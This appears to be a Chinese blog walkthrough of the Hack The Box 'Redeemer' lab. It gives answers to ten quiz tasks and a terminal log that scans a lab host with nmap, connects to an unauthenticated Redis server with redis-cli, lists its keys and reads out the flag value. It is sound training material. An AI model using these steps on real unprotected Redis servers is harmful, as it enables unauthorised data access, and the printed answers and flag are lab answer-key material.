HTB之Redeemer
涂寐 Lv5
  2023-03-01 12:30:32 2023-03-01 12:30   2023-10-08 22:46:07    

声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!

TASK 1

  • 问:计算机上哪个TCP端口是打开的?
  • 答:6379

image

TASK 2

  • 问:哪个服务正在机器上打开的端口上运行?
  • 答:redis

image

TASK 3

  • 问:Redis是什么类型的数据库?从以下选项中选择:(i)内存数据库,(ii)传统数据库
  • 答:In-memory Database

image

TASK 4

  • 问:哪个命令行实用程序用于与Redis服务器交互?输入要在终端中输入的程序名,不带任何参数。
  • 答:redis-cli

image

TASK 5

  • 问:Redis命令行实用程序使用哪个标志来指定主机名?
  • 答:-h

image

TASK 6

  • 问:连接到Redis服务器后,使用哪个命令获取有关Redis服务器的信息和统计信息?
  • 答:info

image

TASK 7

  • 问:目标计算机上使用的Redis服务器的版本是什么?
  • 答:5.0.7

image

TASK 8

  • 问:在Redis中使用哪个命令来选择所需的数据库?
  • 答:select

image

TASK 9

  • 问:索引为0的数据库中有多少个键?
  • 答:4

image

TASK 10

  • 问:获取数据库中所有密钥的命令是什么?
  • 答:keys *

image

SUBMIT FLAG

  • 问:Submit root flag
  • 答:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
# P.S.扫呀扫,我扫不到
kali@kali:~/Test$ nmap -p- --min-rate 5000 -sV 10.129.5.255
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-27 16:08 CST
Nmap scan report for 10.129.5.255
Host is up (0.30s latency).
All 65535 scanned ports on 10.129.5.255 are in ignored states.
Not shown: 65506 filtered tcp ports (no-response), 29 closed tcp ports (conn-refused)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.41 seconds
# P.S.直接指定 6379 端口扫……默认端口
# P.S.可能是我的机子的问题
# P.S.可能靶机扫自闭了
kali@kali:~/Test$ nmap -p6379 -A 10.129.5.255 --min-rate 5000 -Pn
Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-27 16:11 CST
Nmap scan report for 10.129.5.255
Host is up.

PORT     STATE    SERVICE VERSION
6379/tcp filtered redis

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.34 seconds
# P.S.redis-cli --help 查看有哪些参数可用
kali@kali:~/Test$ redis-cli --help
redis-cli 7.0.7

Usage: redis-cli [OPTIONS] [cmd [arg [arg ...]]]
  -h <hostname>      Server hostname (default: 127.0.0.1).
……
kali@kali:~/Test$ redis-cli -h 10.129.5.255
# P.S.info 查看 redis 相关信息
10.129.5.255:6379> info
# Server
redis_version:5.0.7
redis_git_sha1:00000000
……
# Cluster
cluster_enabled:0

# Keyspace
db0:keys=4,expires=0,avg_ttl=0
(1.41s)
# P.S.Keyspace 该字段说明数据库有多少个
# P.S.通过select index 切换到指定数据库
10.129.5.255:6379> select 0
OK
(0.53s)
# P.S.keys pattern 查找所有符合给定模式 pattern 的 key。
10.129.5.255:6379> keys *
1) "numb"
2) "temp"
3) "flag"
4) "stor"
(0.65s)
# P.S.get key 获取指定 key 的值。
10.129.5.255:6379> get flag
"03e1d2b376c37ab3f5319922053953eb"
(0.96s)
10.129.5.255:6379> exit

image

  • P.S.nmap 扫描,开放 6379 端口,对应 redis 服务,redis-cli 尝试连接,查看 redis 相关数据库内容。
  • 本文标题HTB之Redeemer
  • 本文作者涂寐
  • 创建时间2023-03-01 12:30:32
  • 本文链接article/1be3be6a.html
  • 版权声明本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!
 评论
  1. 1. TASK 1
  2. 2. TASK 2
  3. 3. TASK 3
  4. 4. TASK 4
  5. 5. TASK 5
  6. 6. TASK 6
  7. 7. TASK 7
  8. 8. TASK 8
  9. 9. TASK 9
  10. 10. TASK 10
  11. 11. SUBMIT FLAG